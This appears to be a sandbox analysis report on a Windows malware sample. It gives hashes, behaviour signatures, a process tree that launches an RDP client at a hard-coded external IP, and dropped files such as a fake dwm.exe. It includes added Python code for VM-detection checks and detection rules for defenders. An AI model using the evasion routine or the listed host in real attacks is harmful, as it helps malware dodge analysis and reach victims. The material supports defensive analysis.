Analysis

  • max time kernel
    145s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    30-09-2022 20:39

General

  • Target

    1720e833db94e2388213e8dbfd8589819ddc8525295c9e2e6df61c2c6446f136.exe

  • Size

    56KB

  • MD5

    f64ccbc901901c142778923c42a6e582

  • SHA1

    214ec7d3082028bcf42a2f7e86917c2d40b9611b

  • SHA256

    1720e833db94e2388213e8dbfd8589819ddc8525295c9e2e6df61c2c6446f136

  • SHA512

    6571b0c2590b9f60b86515a03ca05bbcfbce3d5f01243b91e4870d465439823551ac4129c4fb520215347b96a1a9223faa5aaffceaa0a4fdbe50cdd7a62e08d9

  • SSDEEP

    768:huxJmUepbOSJr8UzFr4DhlWerv1NwF326QI2:hqJtLUzNehlWQ1CM6P

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of drives other than the default C: drive. In this run the reads come from the legitimate C:\Windows\system32\mstsc.exe (PID 808), so treat them as RDP-client behaviour rather than as the sample probing the sandbox.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI device information is often read to fingerprint virtual disks and so detect sandboxes. Here too the reads are attributed to mstsc.exe (PID 808), not to the sample or to the dropped dwm.exe.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs
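What the two discovery signatures above look for, reproduced as an added example (this is not the sandbox's own signature code and not code from the sample): the drive-root probe and the SCSI Identifier registry read are performed the way an evasion routine would perform them, and the results are classified. The vendor substrings in VM_MARKERS are an assumption; the registry and drive probes only do anything on Windows and are guarded so the classification functions run anywhere.

```python
"""Drive-root enumeration and SCSI Identifier read, plus the classification
an evasion routine applies to the results.  Added example, not from the report."""
import os
import string
from typing import List, Optional

# Registry value commonly read to fingerprint the disk vendor string.
SCSI_KEY = r"HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0"
# Assumption: vendor substrings typical of hypervisor-backed virtual disks.
VM_MARKERS = ("vbox", "vmware", "qemu", "virtual", "xen")


def scsi_identifier() -> Optional[str]:
    """Read the Identifier value (Windows only); None elsewhere or if absent."""
    try:
        import winreg  # Windows-only module
    except ImportError:
        return None
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, SCSI_KEY) as key:
            value, _ = winreg.QueryValueEx(key, "Identifier")
            return str(value)
    except OSError:
        return None


def present_drive_roots(letters: str = string.ascii_uppercase) -> List[str]:
    """Probe every drive root; this is the 'Enumerates connected drives' read."""
    return [f"{c}:\\" for c in letters if os.path.exists(f"{c}:\\")]


def looks_like_vm(identifier: Optional[str]) -> bool:
    """True when the disk vendor string carries a hypervisor marker."""
    if not identifier:
        return False
    ident = identifier.lower()
    return any(marker in ident for marker in VM_MARKERS)


def sandbox_indicators(identifier: Optional[str], roots: List[str]) -> List[str]:
    """Combine both reads the way an evasion routine would: a virtual-disk
    vendor string or a machine with only one drive root both count."""
    hits: List[str] = []
    if looks_like_vm(identifier):
        hits.append(f"scsi_identifier_vm:{identifier}")
    if len(roots) <= 1:
        hits.append("single_drive_only")
    return hits


if __name__ == "__main__":
    print(sandbox_indicators(scsi_identifier(), present_drive_roots()))
```

Run it on a bare analysis VM and on a physical workstation to see which of the two indicators each side trips; that difference is exactly why sandboxes flag these reads even when, as here, the process doing them is a stock Microsoft binary.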

Processes

  • C:\Users\Admin\AppData\Local\Temp\1720e833db94e2388213e8dbfd8589819ddc8525295c9e2e6df61c2c6446f136.exe
    "C:\Users\Admin\AppData\Local\Temp\1720e833db94e2388213e8dbfd8589819ddc8525295c9e2e6df61c2c6446f136.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1092
    • C:\Windows\SysWOW64\mstsc.exe
      mstsc.exe /v:122.128.123.178:3389 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4044
      • C:\Windows\system32\mstsc.exe
        mstsc.exe /v:122.128.123.178:3389 /f
        3⤵
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        PID:808
    • C:\users\Public\documents\dwm.exe
      C://users/Public/documents/dwm.exe
      2⤵
      • Executes dropped EXE
      PID:4968
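Detection logic for the tree above, as an added example (not the sandbox's signature code): the sample launches the built-in RDP client at a hard-coded external address and drops a 6 KB dwm.exe into the world-writable Public\documents folder, both of which are visible in ordinary process-creation telemetry. The events below are constructed from the report's own command lines using Sysmon Event ID 1 field names (the fourth event is a benign control with a made-up PID); the directory lists and rule names are assumptions.

```python
"""Process-creation rules for the tree above, run over constructed events.
Added example; the thresholds and path lists are assumptions."""
import ipaddress
import ntpath
import re
from typing import Dict, Iterable, List

# Where these Microsoft binaries legitimately live.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
# Binary names that droppers borrow; a copy outside SYSTEM_DIRS is suspect.
SYSTEM_BINARIES = {"mstsc.exe", "dwm.exe", "svchost.exe", "csrss.exe", "lsass.exe"}
# Writable locations that should not be parenting an RDP client (assumption).
USER_WRITABLE = (r"\appdata\local\temp", r"\users\public\documents", r"\downloads")

# mstsc /v:<host>[:<port>]  (host may be a name or an IP)
RDP_TARGET = re.compile(r"/v:(?P<host>[^\s:]+)(?::(?P<port>\d+))?", re.IGNORECASE)


def _under(path: str, dirs: Iterable[str]) -> bool:
    p = path.lower()
    return any(d in p for d in dirs)


def _is_public_ip(host: str) -> bool:
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return False  # hostname: cannot judge offline


def classify(ev: Dict[str, str]) -> List[str]:
    """Return the rule names this one event triggers (empty list if clean)."""
    hits: List[str] = []
    image = ntpath.basename(ev["Image"]).lower()
    if image == "mstsc.exe":
        m = RDP_TARGET.search(ev["CommandLine"])
        if m and _under(ev["ParentImage"], USER_WRITABLE):
            hits.append("mstsc_spawned_from_user_writable_path")
        if m and _is_public_ip(m.group("host")):
            hits.append("mstsc_outbound_to_public_ip:" + m.group("host"))
    if image in SYSTEM_BINARIES and not _under(ev["Image"], SYSTEM_DIRS):
        hits.append("system_binary_name_outside_system_dir")
    return hits


def scan(events: Iterable[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map PID -> triggered rules, keeping only events that fired something."""
    result: Dict[str, List[str]] = {}
    for ev in events:
        hits = classify(ev)
        if hits:
            result[ev["ProcessId"]] = hits
    return result


SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\1720e833db94e2388213e8dbfd8589819ddc8525295c9e2e6df61c2c6446f136.exe"
EVENTS = [  # constructed from the report's process tree
    {"ProcessId": "4044", "Image": r"C:\Windows\SysWOW64\mstsc.exe",
     "CommandLine": "mstsc.exe /v:122.128.123.178:3389 /f", "ParentImage": SAMPLE},
    {"ProcessId": "808", "Image": r"C:\Windows\system32\mstsc.exe",
     "CommandLine": "mstsc.exe /v:122.128.123.178:3389 /f",
     "ParentImage": r"C:\Windows\SysWOW64\mstsc.exe"},
    {"ProcessId": "4968", "Image": r"C:\users\Public\documents\dwm.exe",
     "CommandLine": "C://users/Public/documents/dwm.exe", "ParentImage": SAMPLE},
    {"ProcessId": "5120", "Image": r"C:\Windows\System32\mstsc.exe",  # benign control, made-up PID
     "CommandLine": "mstsc.exe /v:10.0.0.5", "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for pid, rules in scan(EVENTS).items():
        print(pid, rules)
```

Note that the first mstsc.exe is the SysWOW64 copy: the 32-bit sample is redirected to it, and it in turn launches the 64-bit System32 client, so the parent-path rule fires on PID 4044 while the public-IP rule fires on both RDP processes. A hostname target (rather than an IP) deliberately does not trigger the public-IP rule, since that decision needs a resolver.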

Network

MITRE ATT&CK Matrix (ATT&CK v6)

Discovery

  • Query Registry (T1012): 2
  • Peripheral Device Discovery (T1120): 2
  • System Information Discovery (T1082): 2

Downloads

  • C:\Users\Public\Documents\RDSv1.dll
    Filesize

    24KB

    MD5

    36f3b718deda0cebb65487b2a0b56678

    SHA1

    5a9a0c523641184d2829155100bd875491be1f5a

    SHA256

    2fca90ac0ae35ef4dd9a99451dc4754bcd53c59ba97c121ffd3e62034b1ecefa

    SHA512

    a30fddfe2526673b2eec78eab91b0a0afcf34e061fee4a3202262a830f94205ecd6d89cdb604abd4ae18027cc122ec2bd8495060a810262e6728f7aac2233e5c

  • C:\Users\Public\Documents\Text.txt
    Filesize

    109KB

    MD5

    81fdb130a76c6315ce98a28e2caea772

    SHA1

    f2965c3571ec298193a02bf7aa126af4faa8b846

    SHA256

    2900531b2df0712e1687ebc17901d5a6d90e8ff2d47650056d748344fc3d467a

    SHA512

    f5e701737121341223caebd1e8ed05a2ef71d2c8f3bce0b673bbd316d928ae3083e8fe2684efa45c5593777f912ab3dac9d3f76a75bda02e5d1d4c64b0d8d04d

  • C:\Users\Public\Documents\calc.dll
    Filesize

    87KB

    MD5

    225d9c27f41c841980c170d65b4d31dd

    SHA1

    2b1381e305c05660b26dd7c571d9b02df88a3f4d

    SHA256

    0d82363a422c876fae84ca27b2b72ab3286ffdf8a2632350bc64680cb8d36de9

    SHA512

    7eca920d383de3e3440225a5ca5930f130bba1f5155dc37920654493130ae3f3073a1eec731eed1b56355700a18d74cf0901b627226350d4d40224e2e5265966

  • C:\Users\Public\Documents\dwm.exe
    Filesize

    6KB

    MD5

    68288c9c86bcd4dbad9f93294926b29b

    SHA1

    9b177ba5a3d22eaf89cb94b3cacf47b6dcdb4496

    SHA256

    720f10d44aa351453f0cc1fbe463de79e4a6f148bbad369dd1295b1b416b07bc

    SHA512

    48fa5027527d9f139440cb9ef355bca906d654d7b20ad0a98eb89924f12e7fcae0f041afba8c300e62cc79ce6aaf32f4116b88ebd37397c79a873a8ff6942ee6

  • C:\users\Public\documents\ClassLibrary2.dll
    Filesize

    5KB

    MD5

    ea309f547d484a9506978a64b46e1759

    SHA1

    5487372323411688d34d5137627c1c5d32d42974

    SHA256

    ea02454269f1059e6d9157a1914e60c2f739d5e185801aeb713dc9eafc4ba9d7

    SHA512

    96328f93e81a8a930bb65f9266f0fd700db5e01a9dcc28c37be49df76733d01d74ee2437d3b1fa4d7aa70baf75a7dffc7d598cc8f2ce581aa030dcb23983988f

  • C:\users\Public\documents\dwm.exe
    Filesize

    6KB

    MD5

    68288c9c86bcd4dbad9f93294926b29b

    SHA1

    9b177ba5a3d22eaf89cb94b3cacf47b6dcdb4496

    SHA256

    720f10d44aa351453f0cc1fbe463de79e4a6f148bbad369dd1295b1b416b07bc

    SHA512

    48fa5027527d9f139440cb9ef355bca906d654d7b20ad0a98eb89924f12e7fcae0f041afba8c300e62cc79ce6aaf32f4116b88ebd37397c79a873a8ff6942ee6

  • memory/808-133-0x0000000000000000-mapping.dmp
  • memory/4044-132-0x0000000000000000-mapping.dmp
  • memory/4968-138-0x00000254720D0000-0x00000254720D6000-memory.dmp
    Filesize

    24KB

  • memory/4968-141-0x00000254724B0000-0x00000254724B8000-memory.dmp
    Filesize

    32KB

  • memory/4968-139-0x00007FFD0F580000-0x00007FFD10041000-memory.dmp
    Filesize

    10.8MB

  • memory/4968-143-0x00000254724E0000-0x00000254724F5000-memory.dmp
    Filesize

    84KB

  • memory/4968-135-0x0000000000000000-mapping.dmp
  • memory/4968-145-0x00007FFD0F580000-0x00007FFD10041000-memory.dmp
    Filesize

    10.8MB